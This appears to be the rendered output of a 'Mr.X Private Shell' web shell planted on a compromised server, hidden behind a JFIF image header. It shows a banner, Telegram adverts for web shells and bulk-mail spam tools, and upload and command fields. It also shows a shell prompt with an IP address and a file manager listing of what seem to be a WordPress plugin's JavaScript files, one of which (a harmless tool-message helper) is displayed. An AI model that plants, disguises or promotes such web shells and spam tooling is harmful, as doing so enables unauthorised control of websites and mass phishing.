����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.217.65: ~ $
import { makeId } from '@agent/lib/util';

// Providers reject a tool/function name with characters outside this set, and
// ability ids are namespaced with a slash (e.g. woocommerce/products-query).
export const toolName = (id) => id.replace(/[^a-zA-Z0-9_.-]/g, '_');

// The provider rejects a tool result unless it's paired with an assistant
// tool-call sharing its id, so emit both.
export const buildToolMessages = ({ id, inputs, result }) => {
	const toolCallId = makeId();
	const name = toolName(id);
	return [
		{
			role: 'assistant',
			content: [
				{ type: 'tool-call', toolCallId, toolName: name, input: inputs ?? {} },
			],
		},
		{
			role: 'tool',
			content: [
				{
					type: 'tool-result',
					toolCallId,
					toolName: name,
					output: { type: 'json', value: result ?? null },
				},
			],
		},
	];
};

Filemanager

Name Type Size Permission Actions
abilities.js File 663 B 0644
blocks.js File 3.01 KB 0644
confetti.js File 1.46 KB 0644
domain-suggestion.js File 2.5 KB 0644
editor.js File 746 B 0644
markdown.js File 670 B 0644
media.js File 1.48 KB 0644
page-tours.js File 723 B 0644
redirects.js File 640 B 0644
svg-blocks-scanner.js File 2.07 KB 0644
svg-helpers.js File 4.91 KB 0644
tool-messages.js File 830 B 0644
tour-helpers.js File 461 B 0644
util.js File 537 B 0644
wp.js File 420 B 0644